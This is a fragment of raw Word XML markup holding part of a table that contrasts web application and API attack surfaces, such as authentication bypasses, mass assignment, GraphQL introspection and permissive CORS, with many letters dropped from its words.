                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>flesystems</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>directory indexing, standard</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">form </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>authentcaton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> bypasses,</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">missing visual session </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>tmeouts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71D5D706" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">Data parsers, improper </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>routng</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> tables,</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>verbose schema outputs, over-</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>permissive HTTP methods (</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="HTMLPreformatted"/>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
              </w:rPr>
              <w:t>PUT</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="HTMLPreformatted"/>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
              </w:rPr>
              <w:t>DELETE</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="HTMLPreformatted"/>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
              </w:rPr>
              <w:t>PATCH</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="610082FC" w14:textId="77777777" w:rsidTr="00B0643B">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27FB6937" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Parameter</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Bindings &amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Payloads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73001DDF" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Standard URL query parameters</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">or form </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>felds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="HTMLPreformatted"/>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
              </w:rPr>
              <w:t>application/x-www-</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="HTMLPreformatted"/>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
              </w:rPr>
              <w:t>form-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="HTMLPreformatted"/>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
              </w:rPr>
              <w:t>urlencoded</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>).</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>Payloads target visual</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>interpretaton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> layers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6686EB5F" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Formats like JSON or XML. Payloads</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">focus on </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>exploitng</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> hidden parser</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">behaviors or </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>requestng</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> unmapped</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>propertes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Mass Assignment</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D66BA1" w:rsidRPr="0083079C" w14:paraId="7F875033" w14:textId="77777777" w:rsidTr="00B064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ADF7D4" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Specifc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Misconfguraton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Mechanics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C096AA4" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Actvatng</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> directory </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>listng</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>exposes compiled code binaries</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">or </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>confguraton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>fles</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> directly to</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>the browser.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="604CDB56" w14:textId="77777777" w:rsidR="00D66BA1" w:rsidRPr="0083079C" w:rsidRDefault="00D66BA1" w:rsidP="00B0643B">
            <w:pPr>
              <w:spacing w:after="240"/>
              <w:jc w:val="both"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>GraphQL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Introspecton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Enabled:</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>The</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">API responds to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>introspecton</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> queries,</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>mapping out the entre backend data</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
              <w:t>graph, query structure, and hidden</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>felds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve">Permissive CORS </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Confguratons</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rFonts w:ascii="Roboto" w:eastAsia="Times New Roman" w:hAnsi="Roboto" w:cs="Arial"/>
              </w:rPr>
              <w:t>Setng</w:t>
            </w:r>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="HTMLPreformatted"/>
                <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
              </w:rPr>
              <w:t>Access</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0083079C">
              <w:rPr>
                <w:rStyle w:val="HTMLPreformatted"/>
